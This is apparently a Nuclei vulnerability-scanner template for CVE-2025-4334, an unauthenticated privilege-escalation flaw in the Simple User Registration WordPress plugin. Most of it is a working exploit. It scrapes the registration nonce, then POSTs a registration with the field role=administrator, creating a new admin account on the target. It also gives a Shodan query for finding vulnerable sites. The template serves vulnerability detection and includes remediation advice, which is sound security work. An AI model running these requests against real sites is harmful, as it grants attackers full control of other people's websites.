漏洞描述
The Simple User Registration plugin ≤ 6.3 is vulnerable to privilege escalation. It lacks proper restrictions on user meta values during registration. Unauthenticated attackers can exploit this to register as administrators.
id: CVE-2025-4334
info:
name: Simple User Registration <= 6.3 - Unauthenticated Privilege Escalation
author: pussycat0x
severity: critical
description: |
The Simple User Registration plugin ≤ 6.3 is vulnerable to privilege escalation. It lacks proper restrictions on user meta values during registration. Unauthenticated attackers can exploit this to register as administrators.
reference:
- https://github.com/Nxploited/CVE-2025-4334
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-4334
epss-score: 0.15409
epss-percentile: 0.94408
cwe-id: CWE-269
impact: |
An attacker can exploit this vulnerability to register with administrator privileges, gaining full control over the WordPress site.
remediation: |
Update the Simple User Registration plugin to a version newer than 6.3 when available, or remove the plugin if not essential.
metadata:
verified: true
max-request: 2
vendor: lifeisincredible
product: simple-user-registration
shodan-query: http.component:"wordpress" && http.html:"/wp-content/plugins/simple-user-registration/"
tags: cve,cve2025,wordpress,wp-plugin,wp,intrusive,plugin,simple-user-registration
variables:
username: "{{randstr}}"
email: "{{randstr}}@{{rand_base(5)}}.com"
password: "{{to_lower(rand_text_alpha(8))}}"
http:
- raw:
- |
GET /register/ HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 417
action=wpr_submit_form&wpr_form_id={{wpr_form_id}}&wpr_nonce={{wpr_nonce}}&_wp_http_referer=%2Fregister%2F&wpr%5Bwp_field%5D%5Buser_login%5D={{username}}&wpr%5Bwp_field%5D%5Bfirst_name%5D=first{{username}}&wpr%5Bwp_field%5D%5Blast_name%5D=last{{username}}&wpr%5Bwp_field%5D%5Buser_email%5D={{email}}&wpr%5Bwp_field%5D%5Bpassword%5D={{password}}&wpr%5Bwp_field%5D%5Bconfirm_password%5D={{password}}&wpr%5Bwp_field%5D%5Brole%5D=administrator
matchers:
- type: dsl
dsl:
- contains(body_1, "WPR Register")
- contains(body_2, "user_id")
- contains(body_2, "Registration Done")
condition: and
extractors:
- type: regex
internal: true
group: 1
name: wpr_nonce
part: body
regex:
- 'name="wpr_nonce" value="([a-f0-9]+)"'
- type: regex
internal: true
group: 1
name: wpr_form_id
part: body
regex:
- 'name="wpr_form_id" value="([0-9]+)"'
# digest: 4a0a0047304502203eab5ee2fb62a689e64964e12a992fc5d411cb845a860fc4bf716506598347f9022100a9805be3b7b408fa0f1c2662e71d19625455ee6cff66b9ed16bf3f19aa74eea3:922c64590222798bb761d5b6d8e72950